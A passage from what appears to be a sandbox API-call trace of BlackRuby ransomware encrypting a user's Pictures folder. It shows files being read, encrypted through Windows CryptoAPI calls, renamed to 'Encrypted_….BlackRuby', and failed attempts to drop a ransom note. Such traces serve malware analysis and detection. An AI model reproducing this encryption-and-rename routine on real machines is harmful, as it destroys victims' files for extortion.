MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif" (normalized: "c:\\users\\eebsym5\\pictures\\5if1l.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_48ycx71sykgqBBDpl2m9ws6O5KOKaIBMh0LTREDbMvv7Ma.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_48ycx71sykgqbbdpl2m9ws6o5kokaibmh0ltredbmvv7ma.blackruby")) returned 1 [0060.572] GetLastError () returned 0xb7 [0060.576] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.576] GetLastError () returned 0xb7 [0060.576] SetErrorMode (uMode=0x1) returned 0x0 [0060.576] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.576] GetLastError () returned 0x5 [0060.578] SetErrorMode (uMode=0x0) returned 0x1 [0060.578] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", lpFilePart=0x0) returned 0x23 [0060.578] GetLastError () returned 0x5 [0060.578] SetErrorMode (uMode=0x1) returned 0x0 [0060.578] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png" (normalized: "c:\\users\\eebsym5\\pictures\\9pwjc.png"), fInfoLevelId=0x0, lpFileInformation=0x1b4716c | out: lpFileInformation=0x1b4716c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18314970, ftCreationTime.dwHighDateTime=0x1d3502d, ftLastAccessTime.dwLowDateTime=0x1a219bb0, ftLastAccessTime.dwHighDateTime=0x1d35657, ftLastWriteTime.dwLowDateTime=0x1a219bb0, ftLastWriteTime.dwHighDateTime=0x1d35657, nFileSizeHigh=0x0, nFileSizeLow=0x14c1c)) returned 1 [0060.578] GetLastError () returned 0x5 [0060.578] SetErrorMode (uMode=0x0) returned 0x1 [0060.579] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", lpFilePart=0x0) returned 0x23 [0060.579] GetLastError () returned 0x5 [0060.579] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", lpFilePart=0x0) returned 0x23 [0060.579] GetLastError () returned 0x5 [0060.579] SetErrorMode (uMode=0x1) returned 0x0 [0060.579] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png" (normalized: "c:\\users\\eebsym5\\pictures\\9pwjc.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.579] GetLastError () returned 0x0 [0060.579] GetFileType (hFile=0x184) returned 0x1 [0060.579] SetErrorMode (uMode=0x0) returned 0x1 [0060.579] GetFileType (hFile=0x184) returned 0x1 [0060.579] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x14c1c [0060.579] GetLastError () returned 0x0 [0060.580] ReadFile (in: hFile=0x184, lpBuffer=0x2c625c0, nNumberOfBytesToRead=0x14c1c, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c625c0*, lpNumberOfBytesRead=0x18ed84*=0x14c1c, lpOverlapped=0x0) returned 1 [0060.580] GetLastError () returned 0x0 [0060.581] CloseHandle (hObject=0x184) returned 1 [0060.581] GetLastError () returned 0x0 [0060.581] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", lpFilePart=0x0) returned 0x23 [0060.581] GetLastError () returned 0x0 [0060.581] SetErrorMode (uMode=0x1) returned 0x0 [0060.581] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png" (normalized: "c:\\users\\eebsym5\\pictures\\9pwjc.png"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18314970, ftCreationTime.dwHighDateTime=0x1d3502d, ftLastAccessTime.dwLowDateTime=0x1a219bb0, ftLastAccessTime.dwHighDateTime=0x1d35657, ftLastWriteTime.dwLowDateTime=0x1a219bb0, ftLastWriteTime.dwHighDateTime=0x1d35657, nFileSizeHigh=0x0, nFileSizeLow=0x14c1c)) returned 1 [0060.581] GetLastError () returned 0x0 [0060.581] SetErrorMode (uMode=0x0) returned 0x1 [0060.581] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c818) returned 1 [0060.582] GetLastError () returned 0x0 [0060.615] CryptImportKey (in: hProv=0x37c818, pbData=0x1ba2fac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360c20) returned 1 [0060.615] GetLastError () returned 0x0 [0060.615] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.615] GetLastError () returned 0x0 [0060.620] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.620] GetLastError () returned 0x0 [0060.620] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360d60) returned 1 [0060.620] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.620] GetLastError () returned 0x0 [0060.620] CryptSetKeyParam (hKey=0x360d60, dwParam=0x4, pbData=0x1bcfff8*=0x1, dwFlags=0x0) returned 1 [0060.620] GetLastError () returned 0x0 [0060.621] CryptSetKeyParam (hKey=0x360d60, dwParam=0x1, pbData=0x1bcffc4, dwFlags=0x0) returned 1 [0060.621] GetLastError () returned 0x0 [0060.621] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c8bf30*, pdwDataLen=0x18ed74*=0x14d10, dwBufLen=0x14d10 | out: pbData=0x2c8bf30*, pdwDataLen=0x18ed74*=0x14d10) returned 1 [0060.621] GetLastError () returned 0x0 [0060.622] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd0054*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bd0054*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.622] GetLastError () returned 0x0 [0060.622] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bd0084*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bd0084*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.622] GetLastError () returned 0x0 [0060.623] CryptDestroyKey (hKey=0x360c20) returned 1 [0060.623] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.623] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", lpFilePart=0x0) returned 0x23 [0060.623] GetLastError () returned 0x0 [0060.623] SetErrorMode (uMode=0x1) returned 0x0 [0060.623] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png" (normalized: "c:\\users\\eebsym5\\pictures\\9pwjc.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.624] GetLastError () returned 0xb7 [0060.624] GetFileType (hFile=0x184) returned 0x1 [0060.624] SetErrorMode (uMode=0x0) returned 0x1 [0060.624] GetFileType (hFile=0x184) returned 0x1 [0060.626] CloseHandle (hObject=0x184) returned 1 [0060.626] GetLastError () returned 0xb7 [0060.626] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png", lpFilePart=0x0) returned 0x23 [0060.626] GetLastError () returned 0xb7 [0060.626] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_0mbc31YiPat0JsZrzrnFX8vQ1ybtYjMoTzg0.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_0mbc31YiPat0JsZrzrnFX8vQ1ybtYjMoTzg0.BlackRuby", lpFilePart=0x0) returned 0x52 [0060.626] GetLastError () returned 0xb7 [0060.626] SetErrorMode (uMode=0x1) returned 0x0 [0060.626] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png" (normalized: "c:\\users\\eebsym5\\pictures\\9pwjc.png"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18314970, ftCreationTime.dwHighDateTime=0x1d3502d, ftLastAccessTime.dwLowDateTime=0x1a219bb0, ftLastAccessTime.dwHighDateTime=0x1d35657, ftLastWriteTime.dwLowDateTime=0x2c5550a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x14d20)) returned 1 [0060.626] GetLastError () returned 0xb7 [0060.626] SetErrorMode (uMode=0x0) returned 0x1 [0060.626] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\9PWjC.png" (normalized: "c:\\users\\eebsym5\\pictures\\9pwjc.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_0mbc31YiPat0JsZrzrnFX8vQ1ybtYjMoTzg0.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_0mbc31yipat0jszrzrnfx8vq1ybtyjmotzg0.blackruby")) returned 1 [0060.627] GetLastError () returned 0xb7 [0060.627] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.627] GetLastError () returned 0xb7 [0060.627] SetErrorMode (uMode=0x1) returned 0x0 [0060.627] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.628] GetLastError () returned 0x5 [0060.628] SetErrorMode (uMode=0x0) returned 0x1 [0060.629] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", lpFilePart=0x0) returned 0x2a [0060.629] GetLastError () returned 0x5 [0060.629] SetErrorMode (uMode=0x1) returned 0x0 [0060.629] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif" (normalized: "c:\\users\\eebsym5\\pictures\\aai29zmblt6h.gif"), fInfoLevelId=0x0, lpFileInformation=0x1bed134 | out: lpFileInformation=0x1bed134*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57a228e0, ftCreationTime.dwHighDateTime=0x1d34b23, ftLastAccessTime.dwLowDateTime=0x32a426d0, ftLastAccessTime.dwHighDateTime=0x1d35846, ftLastWriteTime.dwLowDateTime=0x32a426d0, ftLastWriteTime.dwHighDateTime=0x1d35846, nFileSizeHigh=0x0, nFileSizeLow=0xca1b)) returned 1 [0060.629] GetLastError () returned 0x5 [0060.629] SetErrorMode (uMode=0x0) returned 0x1 [0060.629] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", lpFilePart=0x0) returned 0x2a [0060.629] GetLastError () returned 0x5 [0060.629] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", lpFilePart=0x0) returned 0x2a [0060.629] GetLastError () returned 0x5 [0060.629] SetErrorMode (uMode=0x1) returned 0x0 [0060.629] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif" (normalized: "c:\\users\\eebsym5\\pictures\\aai29zmblt6h.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.629] GetLastError () returned 0x0 [0060.629] GetFileType (hFile=0x184) returned 0x1 [0060.629] SetErrorMode (uMode=0x0) returned 0x1 [0060.629] GetFileType (hFile=0x184) returned 0x1 [0060.629] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xca1b [0060.629] GetLastError () returned 0x0 [0060.629] ReadFile (in: hFile=0x184, lpBuffer=0x1beef18, nNumberOfBytesToRead=0xca1b, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1beef18*, lpNumberOfBytesRead=0x18ed84*=0xca1b, lpOverlapped=0x0) returned 1 [0060.630] GetLastError () returned 0x0 [0060.630] CloseHandle (hObject=0x184) returned 1 [0060.630] GetLastError () returned 0x0 [0060.630] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", lpFilePart=0x0) returned 0x2a [0060.630] GetLastError () returned 0x0 [0060.630] SetErrorMode (uMode=0x1) returned 0x0 [0060.630] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif" (normalized: "c:\\users\\eebsym5\\pictures\\aai29zmblt6h.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57a228e0, ftCreationTime.dwHighDateTime=0x1d34b23, ftLastAccessTime.dwLowDateTime=0x32a426d0, ftLastAccessTime.dwHighDateTime=0x1d35846, ftLastWriteTime.dwLowDateTime=0x32a426d0, ftLastWriteTime.dwHighDateTime=0x1d35846, nFileSizeHigh=0x0, nFileSizeLow=0xca1b)) returned 1 [0060.630] GetLastError () returned 0x0 [0060.630] SetErrorMode (uMode=0x0) returned 0x1 [0060.641] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c626fc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360e60) returned 1 [0060.641] GetLastError () returned 0x0 [0060.641] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.641] GetLastError () returned 0x0 [0060.646] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.646] GetLastError () returned 0x0 [0060.646] CryptDuplicateKey (in: hKey=0x360e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0060.646] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.646] GetLastError () returned 0x0 [0060.646] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c8f748*=0x1, dwFlags=0x0) returned 1 [0060.646] GetLastError () returned 0x0 [0060.646] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c8f714, dwFlags=0x0) returned 1 [0060.646] GetLastError () returned 0x0 [0060.646] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8f790*, pdwDataLen=0x18ed74*=0xcb10, dwBufLen=0xcb10 | out: pbData=0x1c8f790*, pdwDataLen=0x18ed74*=0xcb10) returned 1 [0060.646] GetLastError () returned 0x0 [0060.646] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ca8ddc*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1ca8ddc*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.646] GetLastError () returned 0x0 [0060.646] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ca8e0c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1ca8e0c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.646] GetLastError () returned 0x0 [0060.647] CryptDestroyKey (hKey=0x360e60) returned 1 [0060.647] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.647] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.647] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif", lpFilePart=0x0) returned 0x2a [0060.647] GetLastError () returned 0x0 [0060.647] SetErrorMode (uMode=0x1) returned 0x0 [0060.648] GetFileType (hFile=0x184) returned 0x1 [0060.648] GetFileType (hFile=0x184) returned 0x1 [0060.649] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\AAI29ZMblt6h.gif" (normalized: "c:\\users\\eebsym5\\pictures\\aai29zmblt6h.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_wddp849WjDaSlmvc99zU55L3ENisP6jieOj6baUT3Xl.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_wddp849wjdaslmvc99zu55l3enisp6jieoj6baut3xl.blackruby")) returned 1 [0060.650] GetLastError () returned 0xb7 [0060.650] SetErrorMode (uMode=0x0) returned 0x1 [0060.651] GetFileType (hFile=0x184) returned 0x1 [0060.651] GetFileType (hFile=0x184) returned 0x1 [0060.651] ReadFile (in: hFile=0x184, lpBuffer=0x1cd4798, nNumberOfBytesToRead=0x10c1a, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cd4798*, lpNumberOfBytesRead=0x18ed84*=0x10c1a, lpOverlapped=0x0) returned 1 [0060.652] GetLastError () returned 0x0 [0060.689] CryptImportKey (in: hProv=0x37c790, pbData=0x1b61a70, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0060.689] GetLastError () returned 0x0 [0060.689] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.689] GetLastError () returned 0x0 [0060.694] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.694] GetLastError () returned 0x0 [0060.694] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0060.694] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.694] GetLastError () returned 0x0 [0060.694] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1b8eabc*=0x1, dwFlags=0x0) returned 1 [0060.694] GetLastError () returned 0x0 [0060.694] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1b8ea88, dwFlags=0x0) returned 1 [0060.694] GetLastError () returned 0x0 [0060.694] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b8eb04*, pdwDataLen=0x18ed74*=0x10d10, dwBufLen=0x10d10 | out: pbData=0x1b8eb04*, pdwDataLen=0x18ed74*=0x10d10) returned 1 [0060.695] GetLastError () returned 0x0 [0060.695] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb0550*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bb0550*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.695] GetLastError () returned 0x0 [0060.695] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bb0580*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bb0580*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.695] GetLastError () returned 0x0 [0060.696] CryptDestroyKey (hKey=0x360fa0) returned 1 [0060.696] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.696] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.696] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aMfL0X RghyF4LCIjLcP.gif", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\aMfL0X RghyF4LCIjLcP.gif", lpFilePart=0x0) returned 0x32 [0060.696] GetLastError () returned 0x0 [0060.696] SetErrorMode (uMode=0x1) returned 0x0 [0060.696] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aMfL0X RghyF4LCIjLcP.gif" (normalized: "c:\\users\\eebsym5\\pictures\\amfl0x rghyf4lcijlcp.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.697] GetLastError () returned 0xb7 [0060.697] GetFileType (hFile=0x184) returned 0x1 [0060.697] SetErrorMode (uMode=0x0) returned 0x1 [0060.697] GetFileType (hFile=0x184) returned 0x1 [0060.698] CloseHandle (hObject=0x184) returned 1 [0060.699] GetLastError () returned 0xb7 [0060.699] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aMfL0X RghyF4LCIjLcP.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\aMfL0X RghyF4LCIjLcP.gif", lpFilePart=0x0) returned 0x32 [0060.699] GetLastError () returned 0xb7 [0060.699] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_L8pbEmfNGGImZHIvQXnUlbaVtH22Udgk2dNVp01zC.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_L8pbEmfNGGImZHIvQXnUlbaVtH22Udgk2dNVp01zC.BlackRuby", lpFilePart=0x0) returned 0x57 [0060.699] GetLastError () returned 0xb7 [0060.699] SetErrorMode (uMode=0x1) returned 0x0 [0060.699] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aMfL0X RghyF4LCIjLcP.gif" (normalized: "c:\\users\\eebsym5\\pictures\\amfl0x rghyf4lcijlcp.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda2df050, ftCreationTime.dwHighDateTime=0x1d34f2e, ftLastAccessTime.dwLowDateTime=0xacec60, ftLastAccessTime.dwHighDateTime=0x1d34ce9, ftLastWriteTime.dwLowDateTime=0x2c5ed620, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x10d20)) returned 1 [0060.699] GetLastError () returned 0xb7 [0060.699] SetErrorMode (uMode=0x0) returned 0x1 [0060.699] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\aMfL0X RghyF4LCIjLcP.gif" (normalized: "c:\\users\\eebsym5\\pictures\\amfl0x rghyf4lcijlcp.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_L8pbEmfNGGImZHIvQXnUlbaVtH22Udgk2dNVp01zC.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_l8pbemfnggimzhivqxnulbavth22udgk2dnvp01zc.blackruby")) returned 1 [0060.699] GetLastError () returned 0xb7 [0060.700] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.700] GetLastError () returned 0xb7 [0060.700] SetErrorMode (uMode=0x1) returned 0x0 [0060.700] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.700] GetLastError () returned 0x5 [0060.701] SetErrorMode (uMode=0x0) returned 0x1 [0060.701] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x25 [0060.701] GetLastError () returned 0x5 [0060.701] SetErrorMode (uMode=0x1) returned 0x0 [0060.701] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1bde3ec | out: lpFileInformation=0x1bde3ec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0060.701] GetLastError () returned 0x5 [0060.701] SetErrorMode (uMode=0x0) returned 0x1 [0060.702] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.702] GetLastError () returned 0x5 [0060.702] SetErrorMode (uMode=0x1) returned 0x0 [0060.702] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.702] GetLastError () returned 0x5 [0060.702] SetErrorMode (uMode=0x0) returned 0x1 [0060.703] GetFullPathNameW (in: 